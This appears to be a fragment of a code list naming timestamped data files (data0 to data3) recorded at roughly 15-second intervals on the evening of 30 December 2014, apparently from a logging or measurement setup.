'data0Tue_Dec_30_21_29_21_2014.txt',
'data0Tue_Dec_30_21_29_36_2014.txt',
'data0Tue_Dec_30_21_29_51_2014.txt',
'data0Tue_Dec_30_21_30_06_2014.txt',
'data0Tue_Dec_30_21_30_21_2014.txt',
'data0Tue_Dec_30_21_30_36_2014.txt',
'data0Tue_Dec_30_21_30_50_2014.txt',
'data0Tue_Dec_30_21_31_06_2014.txt',
'data0Tue_Dec_30_21_31_21_2014.txt',
'data0Tue_Dec_30_21_31_36_2014.txt',
'data0Tue_Dec_30_21_31_51_2014.txt',
'data0Tue_Dec_30_21_32_06_2014.txt',
'data0Tue_Dec_30_21_32_21_2014.txt',
'data0Tue_Dec_30_21_32_36_2014.txt',
'data0Tue_Dec_30_21_32_51_2014.txt',
'data0Tue_Dec_30_21_33_05_2014.txt',
'data0Tue_Dec_30_21_33_20_2014.txt',
'data0Tue_Dec_30_21_33_35_2014.txt',
'data0Tue_Dec_30_21_33_50_2014.txt',
'data0Tue_Dec_30_21_34_05_2014.txt',
'data0Tue_Dec_30_21_34_20_2014.txt',
'data0Tue_Dec_30_21_34_34_2014.txt',
'data0Tue_Dec_30_21_34_49_2014.txt',
'data0Tue_Dec_30_21_35_04_2014.txt',
'data0Tue_Dec_30_21_35_20_2014.txt',
'data0Tue_Dec_30_21_35_35_2014.txt',
'data0Tue_Dec_30_21_35_49_2014.txt',
'data0Tue_Dec_30_21_36_04_2014.txt',
'data0Tue_Dec_30_21_36_19_2014.txt',
'data0Tue_Dec_30_21_36_34_2014.txt',
'data0Tue_Dec_30_21_36_49_2014.txt',
'data0Tue_Dec_30_21_37_04_2014.txt',
'data0Tue_Dec_30_21_37_19_2014.txt',
'data0Tue_Dec_30_21_37_34_2014.txt',
'data0Tue_Dec_30_21_37_49_2014.txt',
'data0Tue_Dec_30_21_38_04_2014.txt',
'data0Tue_Dec_30_21_38_18_2014.txt',
'data0Tue_Dec_30_21_38_33_2014.txt',
'data0Tue_Dec_30_21_38_48_2014.txt',
'data0Tue_Dec_30_21_39_03_2014.txt',
'data0Tue_Dec_30_21_39_18_2014.txt',
'data0Tue_Dec_30_21_39_33_2014.txt',
'data0Tue_Dec_30_21_39_48_2014.txt',
'data0Tue_Dec_30_21_40_02_2014.txt',
'data1Tue_Dec_30_21_40_18_2014.txt',
'data1Tue_Dec_30_21_40_33_2014.txt',
'data1Tue_Dec_30_21_40_48_2014.txt',
'data1Tue_Dec_30_21_41_02_2014.txt',
'data1Tue_Dec_30_21_41_17_2014.txt',
'data1Tue_Dec_30_21_41_31_2014.txt',
'data1Tue_Dec_30_21_41_46_2014.txt',
'data1Tue_Dec_30_21_42_01_2014.txt',
'data1Tue_Dec_30_21_42_16_2014.txt',
'data1Tue_Dec_30_21_42_31_2014.txt',
'data1Tue_Dec_30_21_42_46_2014.txt',
'data1Tue_Dec_30_21_43_01_2014.txt',
'data1Tue_Dec_30_21_43_16_2014.txt',
'data1Tue_Dec_30_21_43_31_2014.txt',
'data1Tue_Dec_30_21_43_46_2014.txt',
'data1Tue_Dec_30_21_44_01_2014.txt',
'data1Tue_Dec_30_21_44_15_2014.txt',
'data1Tue_Dec_30_21_44_30_2014.txt',
'data1Tue_Dec_30_21_44_46_2014.txt',
'data1Tue_Dec_30_21_45_01_2014.txt',
'data1Tue_Dec_30_21_45_15_2014.txt',
'data1Tue_Dec_30_21_45_30_2014.txt',
'data1Tue_Dec_30_21_45_45_2014.txt',
'data1Tue_Dec_30_21_46_00_2014.txt',
'data1Tue_Dec_30_21_46_15_2014.txt',
'data1Tue_Dec_30_21_46_29_2014.txt',
'data1Tue_Dec_30_21_46_44_2014.txt',
'data1Tue_Dec_30_21_46_59_2014.txt',
'data1Tue_Dec_30_21_47_14_2014.txt',
'data1Tue_Dec_30_21_47_29_2014.txt',
'data1Tue_Dec_30_21_47_44_2014.txt',
'data1Tue_Dec_30_21_47_59_2014.txt',
'data1Tue_Dec_30_21_48_13_2014.txt',
'data1Tue_Dec_30_21_48_28_2014.txt',
'data1Tue_Dec_30_21_48_43_2014.txt',
'data1Tue_Dec_30_21_48_58_2014.txt',
'data1Tue_Dec_30_21_49_13_2014.txt',
'data1Tue_Dec_30_21_49_28_2014.txt',
'data1Tue_Dec_30_21_49_43_2014.txt',
'data1Tue_Dec_30_21_49_57_2014.txt',
'data1Tue_Dec_30_21_50_13_2014.txt',
'data1Tue_Dec_30_21_50_27_2014.txt',
'data1Tue_Dec_30_21_50_42_2014.txt',
'data1Tue_Dec_30_21_50_57_2014.txt',
'data1Tue_Dec_30_21_51_12_2014.txt',
'data1Tue_Dec_30_21_51_27_2014.txt',
'data1Tue_Dec_30_21_51_42_2014.txt',
'data1Tue_Dec_30_21_51_56_2014.txt',
'data1Tue_Dec_30_21_52_11_2014.txt',
'data1Tue_Dec_30_21_52_26_2014.txt',
'data2Tue_Dec_30_21_52_40_2014.txt',
'data2Tue_Dec_30_21_52_55_2014.txt',
'data2Tue_Dec_30_21_53_10_2014.txt',
'data2Tue_Dec_30_21_53_25_2014.txt',
'data2Tue_Dec_30_21_53_40_2014.txt',
'data2Tue_Dec_30_21_53_54_2014.txt',
'data2Tue_Dec_30_21_54_09_2014.txt',
'data2Tue_Dec_30_21_54_24_2014.txt',
'data2Tue_Dec_30_21_54_39_2014.txt',
'data2Tue_Dec_30_21_54_53_2014.txt',
'data2Tue_Dec_30_21_55_08_2014.txt',
'data2Tue_Dec_30_21_55_23_2014.txt',
'data2Tue_Dec_30_21_55_38_2014.txt',
'data2Tue_Dec_30_21_55_53_2014.txt',
'data2Tue_Dec_30_21_56_08_2014.txt',
'data2Tue_Dec_30_21_56_23_2014.txt',
'data2Tue_Dec_30_21_56_37_2014.txt',
'data2Tue_Dec_30_21_56_52_2014.txt',
'data2Tue_Dec_30_21_57_07_2014.txt',
'data2Tue_Dec_30_21_57_22_2014.txt',
'data2Tue_Dec_30_21_57_37_2014.txt',
'data2Tue_Dec_30_21_57_51_2014.txt',
'data2Tue_Dec_30_21_58_06_2014.txt',
'data2Tue_Dec_30_21_58_21_2014.txt',
'data2Tue_Dec_30_21_58_35_2014.txt',
'data2Tue_Dec_30_21_58_50_2014.txt',
'data2Tue_Dec_30_21_59_05_2014.txt',
'data2Tue_Dec_30_21_59_20_2014.txt',
'data2Tue_Dec_30_21_59_34_2014.txt',
'data2Tue_Dec_30_21_59_50_2014.txt',
'data2Tue_Dec_30_22_00_05_2014.txt',
'data2Tue_Dec_30_22_00_19_2014.txt',
'data2Tue_Dec_30_22_00_34_2014.txt',
'data2Tue_Dec_30_22_00_49_2014.txt',
'data2Tue_Dec_30_22_01_03_2014.txt',
'data2Tue_Dec_30_22_01_18_2014.txt',
'data2Tue_Dec_30_22_01_33_2014.txt',
'data2Tue_Dec_30_22_01_48_2014.txt',
'data2Tue_Dec_30_22_02_03_2014.txt',
'data2Tue_Dec_30_22_02_18_2014.txt',
'data2Tue_Dec_30_22_02_32_2014.txt',
'data2Tue_Dec_30_22_02_47_2014.txt',
'data2Tue_Dec_30_22_03_02_2014.txt',
'data2Tue_Dec_30_22_03_17_2014.txt',
'data2Tue_Dec_30_22_03_31_2014.txt',
'data2Tue_Dec_30_22_03_46_2014.txt',
'data2Tue_Dec_30_22_04_01_2014.txt',
'data2Tue_Dec_30_22_04_15_2014.txt',
'data2Tue_Dec_30_22_04_30_2014.txt',
'data2Tue_Dec_30_22_04_45_2014.txt',
'data3Tue_Dec_30_22_05_00_2014.txt',
'data3Tue_Dec_30_22_05_15_2014.txt',
'data3Tue_Dec_30_22_05_30_2014.txt',
'data3Tue_Dec_30_22_05_44_2014.txt',
'data3Tue_Dec_30_22_06_00_2014.txt',
'data3Tue_Dec_30_22_06_14_2014.txt',
'data3Tue_Dec_30_22_06_29_2014.txt',
'data3Tue_Dec_30_22_06_44_2014.txt',
'data3Tue_Dec_30_22_06_59_2014.txt',
'data3Tue_Dec_30_22_07_14_2014.txt',
'data3Tue_Dec_30_22_07_29_2014.txt',
'data3Tue_Dec_30_22_07_43_2014.txt',
'data3Tue_Dec_30_22_07_58_2014.txt',
'data3Tue_Dec_30_22_08_13_2014.txt',
'data3Tue_Dec_30_22_08_28_2014.txt',
'data3Tue_Dec_30_22_08_43_2014.txt',
'data3Tue_Dec_30_22_08_57_2014.txt',
'data3Tue_Dec_30_22_09_12_2014.txt',
'data3Tue_Dec_30_22_09_27_2014.txt',
'data3Tue_Dec_30_22_09_42_2014.txt',
'data3Tue_Dec_30_22_09_57_2014.txt',
'data3Tue_Dec_30_22_10_12_2014.txt',
'data3Tue_Dec_30_22_10_26_2014.txt',
'data3Tue_Dec_30_22_10_41_2014.txt',
'data3Tue_Dec_30_22_10_56_2014.txt',
'data3Tue_Dec_30_22_11_11_2014.txt',
'data3Tue_Dec_30_22_11_25_2014.txt',
'data3Tue_Dec_30_22_11_41_2014.txt',
'data3Tue_Dec_30_22_11_56_2014.txt',
'data3Tue_Dec_30_22_12_11_2014.txt',
'data3Tue_Dec_30_22_12_26_2014.txt',
'data3Tue_Dec_30_22_12_40_2014.txt',
'data3Tue_Dec_30_22_12_55_2014.txt',
'data3Tue_Dec_30_22_13_10_2014.txt',
'data3Tue_Dec_30_22_13_25_2014.txt',
'data3Tue_Dec_30_22_13_40_2014.txt',
'data3Tue_Dec_30_22_13_55_2014.txt',
'data3Tue_Dec_30_22_14_09_2014.txt',
'data3Tue_Dec_30_22_14_24_2014.txt',
'data3Tue_Dec_30_22_14_39_2014.txt',
'data3Tue_Dec_30_22_14_53_2014.txt',
'data3Tue_Dec_30_22_15_08_2014.txt',
'data3Tue_Dec_30_22_15_23_2014.txt',
'data3Tue_Dec_30_22_15_37_2014.txt',
'data3Tue_Dec_30_22_15_52_2014.txt',
'data3Tue_Dec_30_22_16_07_2014.txt',
'data3Tue_Dec_30_22_16_22_2014.txt',
'data3Tue_Dec_30_22_16_36_2014.txt',
'data3Tue_Dec_30_22_16_51_2014.txt',
'data3Tue_Dec_30_22_17_06_2014.txt',
'data0Tue_Dec_30_22_17_47_2014.txt',
'data0Tue_Dec_30_22_18_01_2014.txt',
'data0Tue_Dec_30_22_18_16_2014.txt',
'data0Tue_Dec_30_22_18_31_2014.txt',
'data0Tue_Dec_30_22_18_46_2014.txt',
'data0Tue_Dec_30_22_19_01_2014.txt',
'data0Tue_Dec_30_22_19_15_2014.txt',
'data0Tue_Dec_30_22_19_30_2014.txt',
'data0Tue_Dec_30_22_19_45_2014.txt',
'data0Tue_Dec_30_22_20_00_2014.txt',
'data0Tue_Dec_30_22_20_15_2014.txt',
'data0Tue_Dec_30_22_20_30_2014.txt',
'data0Tue_Dec_30_22_20_44_2014.txt',
'data0Tue_Dec_30_22_20_59_2014.txt',
'data0Tue_Dec_30_22_21_14_2014.txt',
'data0Tue_Dec_30_22_21_29_2014.txt',
'data0Tue_Dec_30_22_21_44_2014.txt',
'data0Tue_Dec_30_22_21_58_2014.txt',
'data0Tue_Dec_30_22_22_13_2014.txt',
'data0Tue_Dec_30_22_22_28_2014.txt',
'data0Tue_Dec_30_22_22_43_2014.txt',
'data0Tue_Dec_30_22_22_58_2014.txt',
'data0Tue_Dec_30_22_23_12_2014.txt',
'data0Tue_Dec_30_22_23_27_2014.txt',
'data0Tue_Dec_30_22_23_42_2014.txt',
'data0Tue_Dec_30_22_23_57_2014.txt',
'data0Tue_Dec_30_22_24_12_2014.txt',
'data0Tue_Dec_30_22_24_26_2014.txt',
'data0Tue_Dec_30_22_24_41_2014.txt',
'data0Tue_Dec_30_22_24_56_2014.txt',
'data0Tue_Dec_30_22_25_11_2014.txt',
'data0Tue_Dec_30_22_25_25_2014.txt',
'data0Tue_Dec_30_22_25_41_2014.txt',
'data0Tue_Dec_30_22_25_55_2014.txt',
'data0Tue_Dec_30_22_26_10_2014.txt',
'data0Tue_Dec_30_22_26_25_2014.txt',
'data0Tue_Dec_30_22_26_39_2014.txt',
'data0Tue_Dec_30_22_26_54_2014.txt',
'data0Tue_Dec_30_22_27_09_2014.txt',
'data0Tue_Dec_30_22_27_24_2014.txt',
'data0Tue_Dec_30_22_27_39_2014.txt',
'data0Tue_Dec_30_22_27_54_2014.txt',
'data0Tue_Dec_30_22_28_09_2014.txt',
'data0Tue_Dec_30_22_28_23_2014.txt',
'data0Tue_Dec_30_22_28_38_2014.txt',
'data0Tue_Dec_30_22_28_53_2014.txt',
'data0Tue_Dec_30_22_29_08_2014.txt',
'data0Tue_Dec_30_22_29_23_2014.txt',
'data0Tue_Dec_30_22_29_37_2014.txt',
'data0Tue_Dec_30_22_29_52_2014.txt',
'data1Tue_Dec_30_22_30_07_2014.txt',
'data1Tue_Dec_30_22_30_21_2014.txt',
'data1Tue_Dec_30_22_30_36_2014.txt',
'data1Tue_Dec_30_22_30_51_2014.txt',
'data1Tue_Dec_30_22_31_06_2014.txt',
'data1Tue_Dec_30_22_31_20_2014.txt',
'data1Tue_Dec_30_22_31_35_2014.txt',
'data1Tue_Dec_30_22_31_49_2014.txt',
'data1Tue_Dec_30_22_32_04_2014.txt',
'data1Tue_Dec_30_22_32_19_2014.txt',
'data1Tue_Dec_30_22_32_34_2014.txt',
'data1Tue_Dec_30_22_32_48_2014.txt',
'data1Tue_Dec_30_22_33_03_2014.txt',
'data1Tue_Dec_30_22_33_18_2014.txt',
'data1Tue_Dec_30_22_33_33_2014.txt',
'data1Tue_Dec_30_22_33_48_2014.txt',
'data1Tue_Dec_30_22_34_03_2014.txt',
'data1Tue_Dec_30_22_34_17_2014.txt',
'data1Tue_Dec_30_22_34_32_2014.txt',
'data1Tue_Dec_30_22_34_47_2014.txt',
'data1Tue_Dec_30_22_35_01_2014.txt',
'data1Tue_Dec_30_22_35_16_2014.txt',
'data1Tue_Dec_30_22_35_31_2014.txt',
'data1Tue_Dec_30_22_35_46_2014.txt',
'data1Tue_Dec_30_22_36_01_2014.txt',
'data1Tue_Dec_30_22_36_16_2014.txt',
'data1Tue_Dec_30_22_36_30_2014.txt',
'data1Tue_Dec_30_22_36_45_2014.txt',
'data1Tue_Dec_30_22_37_00_2014.txt',
'data1Tue_Dec_30_22_37_15_2014.txt',
'data1Tue_Dec_30_22_37_30_2014.txt',
'data1Tue_Dec_30_22_37_44_2014.txt',
'data1Tue_Dec_30_22_37_59_2014.txt',
'data1Tue_Dec_30_22_38_14_2014.txt',
'data1Tue_Dec_30_22_38_28_2014.txt',
'data1Tue_Dec_30_22_38_44_2014.txt',
'data1Tue_Dec_30_22_38_58_2014.txt',
'data1Tue_Dec_30_22_39_13_2014.txt',
'data1Tue_Dec_30_22_39_28_2014.txt',
'data1Tue_Dec_30_22_39_42_2014.txt',
'data1Tue_Dec_30_22_39_57_2014.txt',
'data1Tue_Dec_30_22_40_13_2014.txt',
'data1Tue_Dec_30_22_40_27_2014.txt',
'data1Tue_Dec_30_22_40_41_2014.txt',
'data1Tue_Dec_30_22_40_56_2014.txt',
'data1Tue_Dec_30_22_41_11_2014.txt',
'data1Tue_Dec_30_22_41_26_2014.txt',
'data1Tue_Dec_30_22_41_41_2014.txt',
'data1Tue_Dec_30_22_41_56_2014.txt',
'data1Tue_Dec_30_22_42_10_2014.txt',
'data2Tue_Dec_30_22_42_25_2014.txt',
'data2Tue_Dec_30_22_42_40_2014.txt',
'data2Tue_Dec_30_22_42_54_2014.txt',
'data2Tue_Dec_30_22_43_09_2014.txt',
'data2Tue_Dec_30_22_43_24_2014.txt',
'data2Tue_Dec_30_22_43_39_2014.txt',
'data2Tue_Dec_30_22_43_53_2014.txt',
'data2Tue_Dec_30_22_44_08_2014.txt',
'data2Tue_Dec_30_22_44_23_2014.txt',
'data2Tue_Dec_30_22_44_37_2014.txt',
'data2Tue_Dec_30_22_44_52_2014.txt',
'data2Tue_Dec_30_22_45_06_2014.txt',
'data2Tue_Dec_30_22_45_21_2014.txt',
'data2Tue_Dec_30_22_45_36_2014.txt',
'data2Tue_Dec_30_22_45_50_2014.txt',
'data2Tue_Dec_30_22_46_05_2014.txt',
'data2Tue_Dec_30_22_46_20_2014.txt',
'data2Tue_Dec_30_22_46_35_2014.txt',
'data2Tue_Dec_30_22_46_50_2014.txt',
'data2Tue_Dec_30_22_47_05_2014.txt',
'data2Tue_Dec_30_22_47_20_2014.txt',
'data2Tue_Dec_30_22_47_35_2014.txt',
'data2Tue_Dec_30_22_47_49_2014.txt',
'data2Tue_Dec_30_22_48_04_2014.txt',
'data2Tue_Dec_30_22_48_19_2014.txt',
'data2Tue_Dec_30_22_48_34_2014.txt',
'data2Tue_Dec_30_22_48_49_2014.txt',
'data2Tue_Dec_30_22_49_04_2014.txt',
'data2Tue_Dec_30_22_49_19_2014.txt',
'data2Tue_Dec_30_22_49_34_2014.txt',
'data2Tue_Dec_30_22_49_49_2014.txt',
'data2Tue_Dec_30_22_50_04_2014.txt',
'data2Tue_Dec_30_22_50_19_2014.txt',
'data2Tue_Dec_30_22_50_33_2014.txt',
'data2Tue_Dec_30_22_50_48_2014.txt',
'data2Tue_Dec_30_22_51_03_2014.txt',
'data2Tue_Dec_30_22_51_18_2014.txt',
'data2Tue_Dec_30_22_51_32_2014.txt',
'data2Tue_Dec_30_22_51_47_2014.txt',
'data2Tue_Dec_30_22_52_02_2014.txt',
'data2Tue_Dec_30_22_52_16_2014.txt',
'data2Tue_Dec_30_22_52_31_2014.txt',
'data2Tue_Dec_30_22_52_46_2014.txt',
'data2Tue_Dec_30_22_53_01_2014.txt',
'data2Tue_Dec_30_22_53_16_2014.txt',
'data2Tue_Dec_30_22_53_31_2014.txt',
'data2Tue_Dec_30_22_53_45_2014.txt',
'data2Tue_Dec_30_22_54_00_2014.txt',
'data2Tue_Dec_30_22_54_15_2014.txt',
'data2Tue_Dec_30_22_54_29_2014.txt',
'data3Tue_Dec_30_22_54_44_2014.txt',
'data3Tue_Dec_30_22_54_59_2014.txt',
'data3Tue_Dec_30_22_55_13_2014.txt',
'data3Tue_Dec_30_22_55_28_2014.txt',
'data3Tue_Dec_30_22_55_43_2014.txt',
'data3Tue_Dec_30_22_55_58_2014.txt',
'data3Tue_Dec_30_22_56_13_2014.txt',
'data3Tue_Dec_30_22_56_28_2014.txt',
'data3Tue_Dec_30_22_56_43_2014.txt',
'data3Tue_Dec_30_22_56_57_2014.txt',
'data3Tue_Dec_30_22_57_12_2014.txt',
'data3Tue_Dec_30_22_57_27_2014.txt',
'data3Tue_Dec_30_22_57_42_2014.txt',
'data3Tue_Dec_30_22_57_56_2014.txt',
'data3Tue_Dec_30_22_58_12_2014.txt',
'data3Tue_Dec_30_22_58_26_2014.txt',
'data3Tue_Dec_30_22_58_41_2014.txt',
'data3Tue_Dec_30_22_58_56_2014.txt',
'data3Tue_Dec_30_22_59_10_2014.txt',
'data3Tue_Dec_30_22_59_25_2014.txt',
'data3Tue_Dec_30_22_59_40_2014.txt',
'data3Tue_Dec_30_22_59_54_2014.txt',
'data3Tue_Dec_30_23_00_10_2014.txt',
'data3Tue_Dec_30_23_00_25_2014.txt',
'data3Tue_Dec_30_23_00_39_2014.txt',
'data3Tue_Dec_30_23_00_54_2014.txt',
'data3Tue_Dec_30_23_01_09_2014.txt',
'data3Tue_Dec_30_23_01_23_2014.txt',
'data3Tue_Dec_30_23_01_38_2014.txt',
'data3Tue_Dec_30_23_01_53_2014.txt',
'data3Tue_Dec_30_23_02_07_2014.txt',
'data3Tue_Dec_30_23_02_22_2014.txt',
'data3Tue_Dec_30_23_02_37_2014.txt',
'data3Tue_Dec_30_23_02_52_2014.txt',
'data3Tue_Dec_30_23_03_06_2014.txt',
'data3Tue_Dec_30_23_03_21_2014.txt',
'data3Tue_Dec_30_23_03_36_2014.txt',
'data3Tue_Dec_30_23_03_51_2014.txt',
'data3Tue_Dec_30_23_04_05_2014.txt',
'data3Tue_Dec_30_23_04_20_2014.txt',
'data3Tue_Dec_30_23_04_34_2014.txt',
'data3Tue_Dec_30_23_04_49_2014.txt',
'data3Tue_Dec_30_23_05_04_2014.txt',
'data3Tue_Dec_30_23_05_19_2014.txt',
'data3Tue_Dec_30_23_05_34_2014.txt',
'data3Tue_Dec_30_23_05_49_2014.txt',
'data3Tue_Dec_30_23_06_04_2014.txt',
'data3Tue_Dec_30_23_06_18_2014.txt',
'data3Tue_Dec_30_23_06_33_2014.txt',
'data3Tue_Dec_30_23_06_48_2014.txt',
'data0Tue_Dec_30_23_07_28_2014.txt',
'data0Tue_Dec_30_23_07_42_2014.txt',
'data0Tue_Dec_30_23_07_58_2014.txt',
'data0Tue_Dec_30_23_08_12_2014.txt',
'data0Tue_Dec_30_23_08_27_2014.txt',
'data0Tue_Dec_30_23_08_42_2014.txt',
'data0Tue_Dec_30_23_08_57_2014.txt',
'data0Tue_Dec_30_23_09_12_2014.txt',
'data0Tue_Dec_30_23_09_27_2014.txt',
'data0Tue_Dec_30_23_09_42_2014.txt',
'data0Tue_Dec_30_23_09_57_2014.txt',
'data0Tue_Dec_30_23_10_12_2014.txt',
'data0Tue_Dec_30_23_10_26_2014.txt',
'data0Tue_Dec_30_23_10_42_2014.txt',
'data0Tue_Dec_30_23_10_57_2014.txt',
'data0Tue_Dec_30_23_11_12_2014.txt',
'data0Tue_Dec_30_23_11_27_2014.txt',
'data0Tue_Dec_30_23_11_42_2014.txt',
'data0Tue_Dec_30_23_11_56_2014.txt',
'data0Tue_Dec_30_23_12_11_2014.txt',
'data0Tue_Dec_30_23_12_26_2014.txt',
'data0Tue_Dec_30_23_12_40_2014.txt',
'data0Tue_Dec_30_23_12_55_2014.txt',
'data0Tue_Dec_30_23_13_10_2014.txt',
'data0Tue_Dec_30_23_13_25_2014.txt',
'data0Tue_Dec_30_23_13_40_2014.txt',
'data0Tue_Dec_30_23_13_55_2014.txt',
'data0Tue_Dec_30_23_14_11_2014.txt',
'data0Tue_Dec_30_23_14_26_2014.txt',
'data0Tue_Dec_30_23_14_40_2014.txt',
'data0Tue_Dec_30_23_14_55_2014.txt',
'data0Tue_Dec_30_23_15_09_2014.txt',
'data0Tue_Dec_30_23_15_24_2014.txt',
'data0Tue_Dec_30_23_15_39_2014.txt',
'data0Tue_Dec_30_23_15_54_2014.txt',
'data0Tue_Dec_30_23_16_08_2014.txt',
'data0Tue_Dec_30_23_16_23_2014.txt',
'data0Tue_Dec_30_23_16_37_2014.txt',
'data0Tue_Dec_30_23_16_52_2014.txt',
'data0Tue_Dec_30_23_17_08_2014.txt',
'data0Tue_Dec_30_23_17_23_2014.txt',
'data0Tue_Dec_30_23_17_37_2014.txt',
'data0Tue_Dec_30_23_17_52_2014.txt',
'data0Tue_Dec_30_23_18_07_2014.txt',
'data0Tue_Dec_30_23_18_22_2014.txt',
'data0Tue_Dec_30_23_18_36_2014.txt',
'data0Tue_Dec_30_23_18_51_2014.txt',
'data0Tue_Dec_30_23_19_06_2014.txt',
'data0Tue_Dec_30_23_19_21_2014.txt',
'data0Tue_Dec_30_23_19_36_2014.txt',
'data1Tue_Dec_30_23_19_50_2014.txt',
'data1Tue_Dec_30_23_20_05_2014.txt',
'data1Tue_Dec_30_23_20_20_2014.txt',
'data1Tue_Dec_30_23_20_34_2014.txt',
'data1Tue_Dec_30_23_20_49_2014.txt',
'data1Tue_Dec_30_23_21_04_2014.txt',
'data1Tue_Dec_30_23_21_19_2014.txt',
'data1Tue_Dec_30_23_21_33_2014.txt',
'data1Tue_Dec_30_23_21_48_2014.txt',
'data1Tue_Dec_30_23_22_03_2014.txt',
'data1Tue_Dec_30_23_22_18_2014.txt',
'data1Tue_Dec_30_23_22_33_2014.txt',
'data1Tue_Dec_30_23_22_48_2014.txt',
'data1Tue_Dec_30_23_23_03_2014.txt',
'data1Tue_Dec_30_23_23_17_2014.txt',
'data1Tue_Dec_30_23_23_32_2014.txt',
'data1Tue_Dec_30_23_23_47_2014.txt',
'data1Tue_Dec_30_23_24_02_2014.txt',
'data1Tue_Dec_30_23_24_16_2014.txt',
'data1Tue_Dec_30_23_24_31_2014.txt',
'data1Tue_Dec_30_23_24_45_2014.txt',
'data1Tue_Dec_30_23_25_00_2014.txt',
'data1Tue_Dec_30_23_25_15_2014.txt',
'data1Tue_Dec_30_23_25_29_2014.txt',
'data1Tue_Dec_30_23_25_44_2014.txt',
'data1Tue_Dec_30_23_25_59_2014.txt',
'data1Tue_Dec_30_23_26_13_2014.txt',
'data1Tue_Dec_30_23_26_28_2014.txt',
'data1Tue_Dec_30_23_26_43_2014.txt',
'data1Tue_Dec_30_23_26_58_2014.txt',
'data1Tue_Dec_30_23_27_13_2014.txt',
'data1Tue_Dec_30_23_27_27_2014.txt',
'data1Tue_Dec_30_23_27_42_2014.txt',
'data1Tue_Dec_30_23_27_57_2014.txt',
'data1Tue_Dec_30_23_28_11_2014.txt',
'data1Tue_Dec_30_23_28_26_2014.txt',
'data1Tue_Dec_30_23_28_42_2014.txt',
'data1Tue_Dec_30_23_28_56_2014.txt',
'data1Tue_Dec_30_23_29_11_2014.txt',
'data1Tue_Dec_30_23_29_26_2014.txt',
'data1Tue_Dec_30_23_29_41_2014.txt',
'data1Tue_Dec_30_23_29_56_2014.txt',
'data1Tue_Dec_30_23_30_10_2014.txt',
'data1Tue_Dec_30_23_30_25_2014.txt',
'data1Tue_Dec_30_23_30_40_2014.txt',
'data1Tue_Dec_30_23_30_55_2014.txt',
'data1Tue_Dec_30_23_31_10_2014.txt',
'data1Tue_Dec_30_23_31_25_2014.txt',
'data1Tue_Dec_30_23_31_39_2014.txt',
'data1Tue_Dec_30_23_31_54_2014.txt',
'data2Tue_Dec_30_23_32_09_2014.txt',
'data2Tue_Dec_30_23_32_24_2014.txt',
'data2Tue_Dec_30_23_32_39_2014.txt',
'data2Tue_Dec_30_23_32_53_2014.txt',
'data2Tue_Dec_30_23_33_08_2014.txt',
'data2Tue_Dec_30_23_33_23_2014.txt',
'data2Tue_Dec_30_23_33_38_2014.txt',
'data2Tue_Dec_30_23_33_53_2014.txt',
'data2Tue_Dec_30_23_34_08_2014.txt',
'data2Tue_Dec_30_23_34_23_2014.txt',
'data2Tue_Dec_30_23_34_37_2014.txt',
'data2Tue_Dec_30_23_34_52_2014.txt',
'data2Tue_Dec_30_23_35_07_2014.txt',
'data2Tue_Dec_30_23_35_22_2014.txt',
'data2Tue_Dec_30_23_35_37_2014.txt',
'data2Tue_Dec_30_23_35_52_2014.txt',
'data2Tue_Dec_30_23_36_07_2014.txt',
'data2Tue_Dec_30_23_36_22_2014.txt',
'data2Tue_Dec_30_23_36_36_2014.txt',
'data2Tue_Dec_30_23_36_51_2014.txt',
'data2Tue_Dec_30_23_37_06_2014.txt',
'data2Tue_Dec_30_23_37_20_2014.txt',
'data2Tue_Dec_30_23_37_35_2014.txt',
'data2Tue_Dec_30_23_37_50_2014.txt',
'data2Tue_Dec_30_23_38_05_2014.txt',
'data2Tue_Dec_30_23_38_20_2014.txt',
'data2Tue_Dec_30_23_38_35_2014.txt',
'data2Tue_Dec_30_23_38_50_2014.txt',
'data2Tue_Dec_30_23_39_05_2014.txt',
'data2Tue_Dec_30_23_39_19_2014.txt',
'data2Tue_Dec_30_23_39_34_2014.txt',
'data2Tue_Dec_30_23_39_49_2014.txt',
'data2Tue_Dec_30_23_40_04_2014.txt',
'data2Tue_Dec_30_23_40_18_2014.txt',
'data2Tue_Dec_30_23_40_33_2014.txt',
'data2Tue_Dec_30_23_40_48_2014.txt',
'data2Tue_Dec_30_23_41_03_2014.txt',
'data2Tue_Dec_30_23_41_18_2014.txt',
'data2Tue_Dec_30_23_41_33_2014.txt',
'data2Tue_Dec_30_23_41_48_2014.txt',
'data2Tue_Dec_30_23_42_03_2014.txt',
'data2Tue_Dec_30_23_42_18_2014.txt',
'data2Tue_Dec_30_23_42_33_2014.txt',
'data2Tue_Dec_30_23_42_47_2014.txt',
'data2Tue_Dec_30_23_43_02_2014.txt',
'data2Tue_Dec_30_23_43_18_2014.txt',
'data2Tue_Dec_30_23_43_33_2014.txt',
'data2Tue_Dec_30_23_43_47_2014.txt',
'data2Tue_Dec_30_23_44_02_2014.txt',
'data2Tue_Dec_30_23_44_17_2014.txt',
'data3Tue_Dec_30_23_44_32_2014.txt',
'data3Tue_Dec_30_23_44_46_2014.txt',
'data3Tue_Dec_30_23_45_01_2014.txt',
'data3Tue_Dec_30_23_45_16_2014.txt',
'data3Tue_Dec_30_23_45_31_2014.txt',
'data3Tue_Dec_30_23_45_46_2014.txt',
'data3Tue_Dec_30_23_46_00_2014.txt',
'data3Tue_Dec_30_23_46_16_2014.txt',
'data3Tue_Dec_30_23_46_31_2014.txt',
'data3Tue_Dec_30_23_46_46_2014.txt',
'data3Tue_Dec_30_23_47_01_2014.txt',
'data3Tue_Dec_30_23_47_16_2014.txt',
'data3Tue_Dec_30_23_47_31_2014.txt',
'data3Tue_Dec_30_23_47_46_2014.txt',
'data3Tue_Dec_30_23_48_01_2014.txt',
'data3Tue_Dec_30_23_48_16_2014.txt',
'data3Tue_Dec_30_23_48_31_2014.txt',
'data3Tue_Dec_30_23_48_45_2014.txt',
'data3Tue_Dec_30_23_49_00_2014.txt',
'data3Tue_Dec_30_23_49_15_2014.txt',
'data3Tue_Dec_30_23_49_30_2014.txt',
'data3Tue_Dec_30_23_49_45_2014.txt',
'data3Tue_Dec_30_23_49_59_2014.txt',
'data3Tue_Dec_30_23_50_14_2014.txt',
'data3Tue_Dec_30_23_50_29_2014.txt',
'data3Tue_Dec_30_23_50_44_2014.txt',
'data3Tue_Dec_30_23_50_59_2014.txt',
'data3Tue_Dec_30_23_51_13_2014.txt',
'data3Tue_Dec_30_23_51_28_2014.txt',
'data3Tue_Dec_30_23_51_43_2014.txt',
'data3Tue_Dec_30_23_51_57_2014.txt',
'data3Tue_Dec_30_23_52_13_2014.txt',
